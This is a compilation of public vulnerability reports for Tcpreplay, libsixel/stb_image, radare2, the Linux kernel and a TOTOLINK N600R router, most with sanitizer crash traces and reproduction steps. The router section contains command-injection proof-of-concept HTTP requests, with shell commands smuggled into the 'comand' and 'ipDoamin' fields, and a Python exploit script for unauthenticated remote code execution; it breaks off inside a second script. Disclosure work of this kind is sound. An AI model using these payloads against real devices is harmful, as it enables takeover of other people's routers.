tcpprep in Tcpreplay 4.4.1 has a heap-based buffer over-read in parse_mpls in common/get.c.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
There is a heap-overflow bug found in parse\_mpls, can be triggered via tcpprep+ ASan

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcpprep --auto=bridge --pcap=$POC --cachefile=/dev/null

Output:

    ==2021941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000142 at pc 0x000000448721 bp 0x7fff4fd006f0 sp 0x7fff4fd006e0
    READ of size 4 at 0x602000000142 thread T0
        #0 0x448720 in parse_mpls (/validate/run1/tcpreplay/tcpprep+0x448720)
        #1 0x44edb0 in parse_metadata (/validate/run1/tcpreplay/tcpprep+0x44edb0)
        #2 0x44c591 in get_l2len_protocol (/validate/run1/tcpreplay/tcpprep+0x44c591)
        #3 0x44fa30 in get_ipv4 (/validate/run1/tcpreplay/tcpprep+0x44fa30)
        #4 0x41434c in process_raw_packets (/validate/run1/tcpreplay/tcpprep+0x41434c)
        #5 0x412708 in main (/validate/run1/tcpreplay/tcpprep+0x412708)
        #6 0x7f6b96777d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x2dd8f)
        #7 0x7f6b96777e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2de3f)
        #8 0x4085f4 in _start (/validate/run1/tcpreplay/tcpprep+0x4085f4)
    
    0x602000000142 is located 2 bytes to the right of 16-byte region [0x602000000130,0x602000000140)
    allocated by thread T0 here:
        #0 0x4dd0d8 in __interceptor_realloc (/validate/run1/tcpreplay/tcpprep+0x4dd0d8)
        #1 0x7f6b969bd1c7  (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x291c7)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/validate/run1/tcpreplay/tcpprep+0x448720) in parse_mpls
    Shadow bytes around the buggy address:
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
      0x0c047fff8010: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
    =>0x0c047fff8020: fa fa fd fd fa fa 00 00[fa]fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2021941==ABORTING
    

**System (please complete the following information):**

*   OS: Ubuntu 20.04
*   Clang 12.0.1
*   Tcpreplay Version : latest commit 09f0774

**Credit**  
NCNIPC of China  
Hexhive

**POC**

POC2.zip

CVE-2022-27942: [Bug] heap buffer overflow in parse_mpls · Issue #719 · appneta/tcpreplay

tcprewrite in Tcpreplay 4.4.1 has a heap-based buffer over-read in get_ipv6_next in common/get.c.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
There is a heap-overflow bug found in get\_ipv6\_next, can be triggered via tcprewrite + ASan

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcprewrite -o /dev/null -i POC  
    output:

    Warning: tcprewrite/crash.1 was captured using a snaplen of 64 bytes.  This may mean you have truncated packets.
    =================================================================
    ==7944==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc3f2e48820 at pc 0x000000535bca bp 0x7ffe1d7fcb70 sp 0x7ffe1d7fcb68
    READ of size 4 at 0x7fc3f2e48820 thread T0
        #0 0x535bc9 in get_ipv6_next /benchmark/vulnerable/tcpreplay/src/common/get.c:679:14
        #1 0x53598e in get_layer4_v6 /benchmark/vulnerable/tcpreplay/src/common/get.c:626:22
        #2 0x4f9bc4 in tcpedit_packet /benchmark/vulnerable/tcpreplay/src/tcpedit/tcpedit.c:198:13
        #3 0x4f80fc in rewrite_packets /benchmark/vulnerable/tcpreplay/src/tcprewrite.c:304:22
        #4 0x4f7418 in main /benchmark/vulnerable/tcpreplay/src/tcprewrite.c:145:9
    
        #5 0x7fc3f175dbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #6 0x41c2c9 in _start (/benchmark/vulnerable/tcpreplay/src/tcprewrite+0x41c2c9)
    
    0x7fc3f2e48820 is located 10 bytes to the right of 262166-byte region [0x7fc3f2e08800,0x7fc3f2e48816)
    allocated by thread T0 here:
        #0 0x4aec90 in malloc /home/nipc/workspace/install/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x536c1f in _our_safe_malloc /benchmark/vulnerable/tcpreplay/src/common/utils.c:50:16
        #2 0x4f7e02 in rewrite_packets /benchmark/vulnerable/tcpreplay/src/tcprewrite.c:267:34
        #3 0x4f7418 in main /benchmark/vulnerable/tcpreplay/src/tcprewrite.c:145:9
        #4 0x7fc3f175dbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /benchmark/vulnerable/tcpreplay/src/common/get.c:679:14 in get_ipv6_next
    Shadow bytes around the buggy address:
      0x0ff8fe5c10b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff8fe5c10c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff8fe5c10d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff8fe5c10e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff8fe5c10f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0ff8fe5c1100: 00 00 06 fa[fa]fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff8fe5c1150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==7944==ABORTING
    

**Screenshots**  

**System (please complete the following information):**

*   OS: Ubuntu
*   OS version : can be reproduced in 18.04/20.04
*   clang version: 12.0.1 (release/12.x)
*   Tcpreplay Version : latest commit 09f0774

**Credit**  
Han Zheng  
NCNIPC of China  
Hexhive

**POC**  
POC2.zip

CVE-2022-27940: [Bug] heap-overflow in get_ipv6_next · Issue #718 · appneta/tcpreplay

stb_image.h (aka the stb image loader) 2.19, as used in libsixel and other products, has a reachable assertion in stbi__create_png_image_raw.

_**Describe the bug**_  
There is a reachable assert bug found in stbi\_\_create\_png\_image\_raw, can be triggered via img2sixel+ ASan

_**To Reproduce**_  
compile the program with CFLAGS="-fsanitize=address" CC=clang  
then run `./img2sixel $POC`  
output:

    img2sixel: ./stb_image.h:4374: int stbi__create_png_image_raw(stbi__png *, stbi_uc *, stbi__uint32, int, stbi__uint32, stbi__uint32, int, int): Assertion `img_width_bytes <= x' failed.
    Aborted
    

_**system**_  
ubuntu 16.04,  
clang 12.0.1  
libsixel latest commit 6a5be8b

_**Acknowledgement**_  
NCNIPC of China

_**POC**_  
poc.zip

CVE-2022-27938: [BUG] a reachable assert in stbi__create_png_image_raw · Issue #163 · saitoha/libsixel

Heap Buffer Overflow in iterate_chained_fixups in GitHub repository radareorg/radare2 prior to 5.6.6.

**Description**

heap buffer overflow in iterate\_chained\_fixups function.

ASAN report：

    =================================================================
    ==2540511==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000065710 at pc 0x7f5b64ccb878 bp 0x7ffeab141380 sp 0x7ffeab141370
    READ of size 8 at 0x602000065710 thread T0
        #0 0x7f5b64ccb877 in iterate_chained_fixups /root/radare2/libr/..//libr/bin/p/../format/mach0/mach0.c:4562
        #1 0x7f5b64c77396 in rebase_buffer /root/radare2/libr/..//libr/bin/p/bin_mach0.c:807
        #2 0x7f5b64c76cd2 in rebasing_and_stripping_io_read /root/radare2/libr/..//libr/bin/p/bin_mach0.c:768
        #3 0x7f5b6e4aa493 in r_io_plugin_read /root/radare2/libr/io/io_plugin.c:161
        #4 0x7f5b6e4b3d19 in r_io_desc_read /root/radare2/libr/io/io_desc.c:213
        #5 0x7f5b6e4c708c in r_io_fd_read /root/radare2/libr/io/io_fd.c:24
        #6 0x7f5b6ffa0369 in buf_io_read /root/radare2/libr/util/buf_io.c:72
        #7 0x7f5b6ffa1fc2 in buf_read /root/radare2/libr/util/buf.c:46
        #8 0x7f5b6ffa5ef3 in r_buf_read /root/radare2/libr/util/buf.c:452
        #9 0x7f5b6ffa7259 in r_buf_read_at /root/radare2/libr/util/buf.c:600
        #10 0x7f5b64ccafb8 in get_hdr /root/radare2/libr/..//libr/bin/p/../format/mach0/mach0.c:4517
        #11 0x7f5b64cca3dc in mach_fields /root/radare2/libr/..//libr/bin/p/../format/mach0/mach0.c:4417
        #12 0x7f5b64aa04a1 in r_bin_object_set_items /root/radare2/libr/bin/bobj.c:310
        #13 0x7f5b64a9d2a6 in r_bin_object_new /root/radare2/libr/bin/bobj.c:168
        #14 0x7f5b64a91db0 in r_bin_file_new_from_buffer /root/radare2/libr/bin/bfile.c:585
        #15 0x7f5b64a4f9f9 in r_bin_open_buf /root/radare2/libr/bin/bin.c:279
        #16 0x7f5b64a5082e in r_bin_open_io /root/radare2/libr/bin/bin.c:339
        #17 0x7f5b66ecb223 in r_core_file_do_load_for_io_plugin /root/radare2/libr/core/cfile.c:435
        #18 0x7f5b66ecdd77 in r_core_bin_load /root/radare2/libr/core/cfile.c:636
        #19 0x7f5b6f96ab18 in r_main_radare2 /root/radare2/libr/main/radare2.c:1184
        #20 0x564e0b55f937 in main /root/radare2/binr/radare2/radare2.c:96
        #21 0x7f5b6ed6e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
        #22 0x564e0b55f30d in _start (/root/radare2/binr/radare2/radare2+0x230d)
    
    0x602000065711 is located 0 bytes to the right of 1-byte region [0x602000065710,0x602000065711)
    allocated by thread T0 here:
        #0 0x7f5b70abba06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153
        #1 0x7f5b64c96f4b in parse_chained_fixups /root/radare2/libr/..//libr/bin/p/../format/mach0/mach0.c:1517
        #2 0x7f5b64ca2b6b in init_items /root/radare2/libr/..//libr/bin/p/../format/mach0/mach0.c:2069
        #3 0x7f5b64ca2f29 in init /root/radare2/libr/..//libr/bin/p/../format/mach0/mach0.c:2092
        #4 0x7f5b64ca55fa in new_buf /root/radare2/libr/..//libr/bin/p/../format/mach0/mach0.c:2207
        #5 0x7f5b64c6a112 in load_buffer /root/radare2/libr/..//libr/bin/p/bin_mach0.c:57
        #6 0x7f5b64a9cd3b in r_bin_object_new /root/radare2/libr/bin/bobj.c:147
        #7 0x7f5b64a91db0 in r_bin_file_new_from_buffer /root/radare2/libr/bin/bfile.c:585
        #8 0x7f5b64a4f9f9 in r_bin_open_buf /root/radare2/libr/bin/bin.c:279
        #9 0x7f5b64a5082e in r_bin_open_io /root/radare2/libr/bin/bin.c:339
        #10 0x7f5b66ecb223 in r_core_file_do_load_for_io_plugin /root/radare2/libr/core/cfile.c:435
        #11 0x7f5b66ecdd77 in r_core_bin_load /root/radare2/libr/core/cfile.c:636
        #12 0x7f5b6f96ab18 in r_main_radare2 /root/radare2/libr/main/radare2.c:1184
        #13 0x564e0b55f937 in main /root/radare2/binr/radare2/radare2.c:96
        #14 0x7f5b6ed6e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/radare2/libr/..//libr/bin/p/../format/mach0/mach0.c:4562 in iterate_chained_fixups
    Shadow bytes around the buggy address:
      0x0c0480004a90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 02 fa
      0x0c0480004aa0: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 00 02
      0x0c0480004ab0: fa fa 00 02 fa fa 02 fa fa fa 05 fa fa fa 05 fa
      0x0c0480004ac0: fa fa 00 00 fa fa 00 02 fa fa 05 fa fa fa 00 06
      0x0c0480004ad0: fa fa 00 00 fa fa 00 fa fa fa 05 fa fa fa 02 fa
    =>0x0c0480004ae0: fa fa[01]fa fa fa 05 fa fa fa 07 fa fa fa 00 fa
      0x0c0480004af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0480004b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0480004b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0480004b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0480004b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2540511==ABORTING
    

**How can we reproduce the issue?**

Compile command

    ./sys/sanitize.sh
    

reproduce command

tests\_65305.zip

    unzip tests_65305.zip
    ./radare2 -qq -AA <poc_file>
    

**Impact**

latest commit and latest release

$ ./radare2 -v radare2 5.6.5 27847 @ linux-x86-64 git.5.6.2 commit: 60182bb63a77282ae469654556b899dbe2a7674c build: 2022-03-22\_\_09:29:41 $ cat /etc/issue Ubuntu 20.04.3 LTS \\n \\l

CVE-2022-1052: Heap Buffer Overflow in iterate_chained_fixups in radare2

A vulnerability was found in the Linux kernel's block_invalidatepage in fs/buffer.c in the filesystem. A missing sanity check may allow a local attacker with user privilege to cause a denial of service (DOS) problem.

Messages in this thread

*   First message in thread
*   Hao Sun
    *   Christoph Hellwig
        *   Hao Sun
            *   Christoph Hellwig
                *   Yang Shi

![/](https://lkml.org/images/icornerl.gif)

From

Date

Mon, 13 Sep 2021 10:00:27 +0800

Subject

general protection fault in wb\_timer\_fn

Hello,

When using Healer to fuzz the latest Linux kernel, the following crash  
was triggered.

HEAD commit:  4b93c544e90e-thunderbolt: test: split up test cases  
git tree: upstream  
console output:  
https://drive.google.com/file/d/1naN-5p-rFgKpHrshO\_kQr5f\_KlhvFGGU/view?usp=sharing  
kernel config: https://drive.google.com/file/d/1c0u2EeRDhRO-ZCxr9MP2VvAtJd6kfg-p/view?usp=sharing  
C reproducer: https://drive.google.com/file/d/19EDhssGw\_V1oO2vWOPrgQqve0TdFSgvh/view?usp=sharing  
Syzlang reproducer:  
https://drive.google.com/file/d/13EGCCoaMe9oitrQCfy44BkGVLbKKFP6X/view?usp=sharing  
Similar report:  
https://groups.google.com/g/syzkaller-bugs/c/H7fKH\_5GVSE/m/-1aj5-d1BAAJ

If you fix this issue, please add the following tag to the commit:  
Reported-by: Hao Sun <sunhao.th@gmail.com>

general protection fault, probably for non-canonical address  
0xdffffc0000000029: 0000 \[#1\] PREEMPT SMP KASAN  
KASAN: null-ptr-deref in range \[0x0000000000000148-0x000000000000014f\]  
CPU: 2 PID: 8539 Comm: syz-executor Not tainted 5.14.0+ #1  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
1.13.0-1ubuntu1.1 04/01/2014  
RIP: 0010:latency\_exceeded block/blk-wbt.c:237 \[inline\]  
RIP: 0010:wb\_timer\_fn+0x149/0x2080 block/blk-wbt.c:360  
Code: 03 80 3c 02 00 0f 85 08 1c 00 00 48 8b 9b b0 00 00 00 48 b8 00  
00 00 00 00 fc ff df 48 8d bb 48 01 00 00 48 89 fa 48 c1 ea 03 <80> 3c  
02 00 0f 85 d5 1b 00 00 48 8b 83 48 01 00 00 48 8d 7d 28 48  
RSP: 0018:ffffc90000848cd0 EFLAGS: 00010212  
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: ffff888014e79c80  
RDX: 0000000000000029 RSI: ffff888014e79c80 RDI: 0000000000000148  
RBP: ffff88801e2adc00 R08: ffffffff83de2dfd R09: 0000000000000003  
R10: 0000000000000005 R11: ffffed1003c55bb0 R12: 0000000000000003  
R13: 0000000000000000 R14: ffff8881053bc800 R15: ffff88801e2adcd0  
FS:  0000000003176940(0000) GS:ffff888063f00000(0000) knlGS:0000000000000000  
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
CR2: 00000000014d53ad CR3: 000000002e5ff000 CR4: 0000000000350ee0  
Call Trace:  
 <IRQ>  
 call\_timer\_fn+0x1a5/0x6b0 kernel/time/timer.c:1421  
 expire\_timers kernel/time/timer.c:1466 \[inline\]  
 \_\_run\_timers.part.0+0x6b0/0xa90 kernel/time/timer.c:1734  
 \_\_run\_timers kernel/time/timer.c:1715 \[inline\]  
 run\_timer\_softirq+0xb6/0x1d0 kernel/time/timer.c:1747  
 \_\_do\_softirq+0x1d7/0x93b kernel/softirq.c:558  
 invoke\_softirq kernel/softirq.c:432 \[inline\]  
 \_\_irq\_exit\_rcu kernel/softirq.c:636 \[inline\]  
 irq\_exit\_rcu+0xf2/0x130 kernel/softirq.c:648  
 sysvec\_apic\_timer\_interrupt+0x93/0xc0 arch/x86/kernel/apic/apic.c:1097  
 </IRQ>  
 asm\_sysvec\_apic\_timer\_interrupt+0x12/0x20 arch/x86/include/asm/idtentry.h:638  
RIP: 0010:get\_current arch/x86/include/asm/current.h:15 \[inline\]  
RIP: 0010:write\_comp\_data+0xe/0x70 kernel/kcov.c:217  
Code: 00 8b 89 1c 15 00 00 48 8b 02 48 83 c0 01 48 39 c1 76 07 4c 89  
04 c2 48 89 02 c3 90 49 89 fa bf 03 00 00 00 49 89 f1 49 89 d0 <65> 48  
8b 34 25 40 f0 01 00 e8 34 ff ff ff 84 c0 74 44 48 8b 86 20  
RSP: 0018:ffffc9000106f7f8 EFLAGS: 00000246  
RAX: 000000000d0444bb RBX: 80000000fd589217 RCX: ffffffff81ac95bd  
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003  
RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000007 R11: ffffed100247709c R12: 0000000000000000  
R13: 0000000000000001 R14: dffffc0000000000 R15: ffff88802e806788  
 copy\_present\_pte mm/memory.c:976 \[inline\]  
 copy\_pte\_range mm/memory.c:1070 \[inline\]  
 copy\_pmd\_range mm/memory.c:1156 \[inline\]  
 copy\_pud\_range mm/memory.c:1193 \[inline\]  
 copy\_p4d\_range mm/memory.c:1217 \[inline\]  
 copy\_page\_range+0xf4d/0x4750 mm/memory.c:1290  
 dup\_mmap kernel/fork.c:610 \[inline\]  
 dup\_mm+0xa50/0x13d0 kernel/fork.c:1454  
 copy\_mm kernel/fork.c:1506 \[inline\]  
 copy\_process+0x6c23/0x73d0 kernel/fork.c:2195  
 kernel\_clone+0xe7/0x10d0 kernel/fork.c:2585  
 \_\_do\_sys\_clone+0xc8/0x110 kernel/fork.c:2702  
 do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]  
 do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80  
 entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae  
RIP: 0033:0x471f0f  
Code: ed 0f 85 64 01 00 00 64 4c 8b 0c 25 10 00 00 00 45 31 c0 4d 8d  
91 d0 02 00 00 31 d2 31 f6 bf 11 00 20 01 b8 38 00 00 00 0f 05 <48> 3d  
00 f0 ff ff 0f 87 f5 00 00 00 41 89 c5 85 c0 0f 85 fc 00 00  
RSP: 002b:00007ffc62d06000 EFLAGS: 00000246 ORIG\_RAX: 0000000000000038  
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 0000000000471f0f  
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000001200011  
RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000003176940  
R10: 0000000003176c10 R11: 0000000000000246 R12: 0000000000000001  
R13: 0000000000000005 R14: 00007ffc62d060b0 R15: 00007ffc62d0606c  
Modules linked in:  
Dumping ftrace buffer:  
   (ftrace buffer empty)  
\---\[ end trace ef2331b2238dd17a \]---  
RIP: 0010:latency\_exceeded block/blk-wbt.c:237 \[inline\]  
RIP: 0010:wb\_timer\_fn+0x149/0x2080 block/blk-wbt.c:360  
Code: 03 80 3c 02 00 0f 85 08 1c 00 00 48 8b 9b b0 00 00 00 48 b8 00  
00 00 00 00 fc ff df 48 8d bb 48 01 00 00 48 89 fa 48 c1 ea 03 <80> 3c  
02 00 0f 85 d5 1b 00 00 48 8b 83 48 01 00 00 48 8d 7d 28 48  
RSP: 0018:ffffc90000848cd0 EFLAGS: 00010212  
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: ffff888014e79c80  
RDX: 0000000000000029 RSI: ffff888014e79c80 RDI: 0000000000000148  
RBP: ffff88801e2adc00 R08: ffffffff83de2dfd R09: 0000000000000003  
R10: 0000000000000005 R11: ffffed1003c55bb0 R12: 0000000000000003  
R13: 0000000000000000 R14: ffff8881053bc800 R15: ffff88801e2adcd0  
FS:  0000000003176940(0000) GS:ffff888063f00000(0000) knlGS:0000000000000000  
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
CR2: 00000000014d53ad CR3: 000000002e5ff000 CR4: 0000000000350ee0  
\----------------  
Code disassembly (best guess):  
   0: 03 80 3c 02 00 0f    add    0xf00023c(%rax),%eax  
   6: 85 08                test   %ecx,(%rax)  
   8: 1c 00                sbb    $0x0,%al  
   a: 00 48 8b              add    %cl,-0x75(%rax)  
   d: 9b                    fwait  
   e: b0 00                mov    $0x0,%al  
  10: 00 00                add    %al,(%rax)  
  12: 48 b8 00 00 00 00 00 movabs $0xdffffc0000000000,%rax  
  19: fc ff df  
  1c: 48 8d bb 48 01 00 00 lea    0x148(%rbx),%rdi  
  23: 48 89 fa              mov    %rdi,%rdx  
  26: 48 c1 ea 03          shr    $0x3,%rdx  
\* 2a: 80 3c 02 00          cmpb   $0x0,(%rdx,%rax,1) <-- trapping instruction  
  2e: 0f 85 d5 1b 00 00    jne    0x1c09  
  34: 48 8b 83 48 01 00 00 mov    0x148(%rbx),%rax  
  3b: 48 8d 7d 28          lea    0x28(%rbp),%rdi  
  3f: 48                    rex.W%

![\](https://lkml.org/images/icornerr.gif)

CVE-2021-4148: general protection fault in wb_timer_fn

TOTOLINK N600R V4.3.0cu.7570_B20200620 was discovered to contain a command injection vulnerability via the langType parameter in the login interface.

**TOTOlink N600R Comand Injection****Venda**

ToTolink N600R http://totolink.net/home/menu/detail/menu\_listtpl/download/id/160/ids/36.html

link :http://totolink.net/data/upload/20200728/5fa781d2e6a17e1ed1cbf6f169810809.zip

Name:TOTOLINK\_C8160R-1C\_N600R\_IP04291\_8196D\_SPI\_4M32M\_V4.3.0cu.7570\_B20200620\_ALL.web

ToTolink 7100RU:

Firmware\_link: http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

Name: TOTOLINK\_C8540R-1C\_A7100RU\_IP04365\_MT7621AMT7615Ex2\_SPI\_16M128M\_V7.4cu.2313\_B20191024\_ALL.web

**Vulnerability1****Detail**

​ In TOTOLINK N600R equipment cstecgi.cgi file has command injection at the exportovpn interface, which can lead to unauthenticated RCE

​ Received the environment variable QUERY\_STRING in the cstecgi.cgi binary file, which is the URL to visit

![image-20211111143526075](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20211111143526075.png)

Later, it will be judged whether there is exportOvpn, and it is found that it can cause command injection by constructing a url request

![image-20211111142430082](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20211111142430082.png)

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  

POST /cgi-bin/cstecgi.cgi?exportOvpn=&type=user&comand=;touch${IFS}1.txt;&filetype=gz HTTP/1.1  
Host: 192.168.0.254  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:93.0) Gecko/20100101 Firefox/93.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 5  
  
aaaaa  

**EXP**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  

import sys  
import requests  
import json  
command\=sys.argv\[1\]  
try:  
	ip\=sys.argv\[1\]  
	port\=sys.argv\[2\]  
	command\=sys.argv\[3\]  
except:  
	print "nonono! cant't do this"  
	print "please use python exp.py \[ip\] \[port\] \[command\]"  
	exit()  
url\="http://%s:%s/cgi-bin/cstecgi.cgi?exportOvpn=&type=user&comand=;%s;&filetype=gz"%(ip,port,command)  
  
  
headers={  
	"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:94.0) Gecko/20100101 Firefox/94.0",  
	"Accept-Language":"en-US,en;q=0.5",  
	"Accept-Encoding":"gzip, deflate",  
	"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",  
	"X-Requested-With":"XMLHttpRequest",  
	"Origin":"http://%s:%s"%(ip,port),  
}  
  
  
requests.post(url,headers\=headers)  

**verification**

![image-20220221175918709](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20220221175918709.png)

**Vulnerability2****Detail**

​ In TOTOLINK N600R equipment ,The vulnerability lies in cstecgi.cgi JSON data can be passed in the function of testing Ping, resulting in unauthenticated RCE

![image-20211111122344967](https://raw.githubusercontent.com/doudoudedi/blog-img/master/img/image-20211111122344967.png)

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

POST /cgi-bin/cstecgi.cgi HTTP/1.1  
Host: 192.168.0.1  
Connection: close  
Accept-Encoding: gzip, deflate  
Accept: \*/\*  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:94.0) Gecko/20100101 Firefox/94.0  
Origin: http://192.168.0.1  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.0.1/adm/diagnosis.asp?timestamp=1636595925423  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 95  
  
{"topicurl": "setting/setDiagnosisCfg", "actionFlag": "1", "ipDoamin": "www.baidu.com\\nreboot\\n"}  

**EXP**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  

import sys  
import requests  
import json  
try:  
	ip\=sys.argv\[1\]  
	port\=sys.argv\[2\]  
except:  
	print "nonono! cant't do this"  
	print "please use python exp.py \[ip\] \[port\] \[command\]"  
	exit()  
url\="http://%s:%s/cgi-bin/cstecgi.cgi"%(ip,port)  
  
  
command\='ls -al'  
headers={  
